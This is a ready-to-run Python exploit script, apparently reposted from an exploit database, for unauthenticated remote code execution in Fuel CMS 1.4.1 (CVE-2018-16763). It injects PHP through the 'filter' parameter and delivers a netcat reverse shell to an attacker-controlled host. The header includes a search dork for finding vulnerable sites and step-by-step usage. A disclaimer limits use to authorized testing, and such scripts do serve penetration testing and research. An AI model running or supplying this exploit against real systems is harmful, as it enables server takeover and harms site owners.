Share
## https://sploitus.com/exploit?id=PACKETSTORM:218426
#!/usr/bin/python3
    # Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (RCE) via filter parameter
    # Google Dork: intitle:"Welcome to Fuel CMS" inurl:/fuel/
    # Date: 2025-04-05
    # Exploit Author: Suraj Gupta (0xmrsecurity)
    # Author GitHub: https://github.com/0xmrsecurity
    # Vendor Homepage: https://www.getfuelcms.com/
    # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    # Version: 1.4.1
    # Tested on: Kali Linux 2024.1, Ubuntu 20.04
    # CVE: CVE-2018-16763
    # References:
    #   https://nvd.nist.gov/vuln/detail/CVE-2018-16763
    #   https://github.com/0xmrsecurity/Public_Poc/tree/main/CVE-2018-16763
    #
    # Description:
    #   Fuel CMS version 1.4.1 is vulnerable to Remote Code Execution (RCE) via
    #   the 'filter' parameter in /fuel/pages/select/. The parameter is passed
    #   unsanitized to PHP's eval() function, allowing an unauthenticated attacker
    #   to inject arbitrary PHP code and achieve OS-level command execution.
    #   Exploitation delivers a reverse shell to an attacker-controlled listener.
    #
    # Vulnerable Endpoint:
    #   GET /fuel/pages/select/?filter=[payload]
    #
    # Payload Technique:
    #   '+pi(print($a='system'))+$a('OS_COMMAND')+'
    #   The filter value is URL-encoded and injected into an eval() context.
    #
    # Impact:
    #   Unauthenticated Remote Code Execution โ€” complete server compromise.
    #   CVSS v3 Base Score: 9.8 (Critical)
    #
    # Usage:
    #   Step 1: Start a netcat listener on your attacker machine:
    #           nc -lvnp <PORT>
    #
    #   Step 2: Run the exploit:
    #           python3 CVE-2018-16763.py --ip <TARGET_IP> --rhost <YOUR_IP> --rport <YOUR_PORT>
    #
    #   Example:
    #           python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444
    #
    # Disclaimer:
    #   This exploit is for authorized penetration testing and educational purposes only.
    #   Use only on systems you own or have explicit written permission to test.
    #   The author is not responsible for any misuse or damage caused by this tool.
    
    import requests
    import urllib.parse
    import argparse
    import sys
    
    BANNER = """
      _____ _   _ ______ _        _____ __  __  _____   ____   _____ ______
     |  ___| | | || ____| |      / ____|  \/  |/ ____| |  _ \ / ____|  ____|
     | |_  | | | || |__  | |    | |    | \  / | (___   | |_) | |    | |__
     |  _| | | | ||  __| | |    | |    | |\/| |\___ \  |  _ <| |    |  __|
     | |   | |_| || |____| |____| |____| |  | |____) | | |_) | |____| |____
     |_|    \___/ |______|______|\_____|_|  |_|_____/  |____/ \_____|______|
    
     CVE-2018-16763 | Fuel CMS 1.4.1 - Unauthenticated RCE
     Author: Suraj Gupta | github.com/0xmrsecurity
    """
    
    def build_payload(rhost, rport):
        shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {rhost} {rport} >/tmp/f"
        encoded = urllib.parse.quote(shell)
        return encoded
    
    def exploit(target_ip, rhost, rport):
        print(BANNER)
        print(f"[*] Target      : http://{target_ip}")
        print(f"[*] Callback    : {rhost}:{rport}")
        print(f"[*] CVE         : CVE-2018-16763")
        print(f"[*] Affected    : Fuel CMS v1.4.1")
        print("-" * 55)
    
        payload = build_payload(rhost, rport)
    
        url = (
            f"http://{target_ip}/fuel/pages/select/"
            f"?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29"
            f"%2b%24%61%28%27{payload}%27%29%2b%27"
        )
    
        print(f"[+] Sending exploit payload to target...")
        print(f"[!] Start your listener now: nc -lvnp {rport}")
        print("-" * 55)
    
        try:
            r = requests.get(url, timeout=8)
            print(f"[+] Request sent โ€” HTTP {r.status_code}")
            if r.status_code == 200:
                print(f"[+] Payload delivered successfully.")
                print(f"[+] Check your listener on {rhost}:{rport} for reverse shell.")
            else:
                print(f"[-] Unexpected response code: {r.status_code}")
                print(f"[*] Target may be patched or unreachable.")
        except requests.exceptions.ConnectionError:
            print("[-] Connection failed โ€” target may be down or IP is incorrect.")
            sys.exit(1)
        except requests.exceptions.Timeout:
            print("[+] Request timed out โ€” this may indicate the shell connected!")
            print(f"[+] Check your listener on {rhost}:{rport}")
        except Exception as e:
            print(f"[-] Unexpected error: {e}")
            sys.exit(1)
    
    def main():
        parser = argparse.ArgumentParser(
            prog='CVE-2018-16763',
            description='Fuel CMS 1.4.1 โ€” Unauthenticated Remote Code Execution',
            epilog='Example: python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444'
        )
        parser.add_argument('--ip',    required=True, help='Target IP running Fuel CMS 1.4.1')
        parser.add_argument('--rhost', required=True, help='Your attacker/listener IP')
        parser.add_argument('--rport', required=True, help='Your attacker/listener port')
        args = parser.parse_args()
        exploit(args.ip, args.rhost, args.rport)
    
    if __name__ == '__main__':
        main()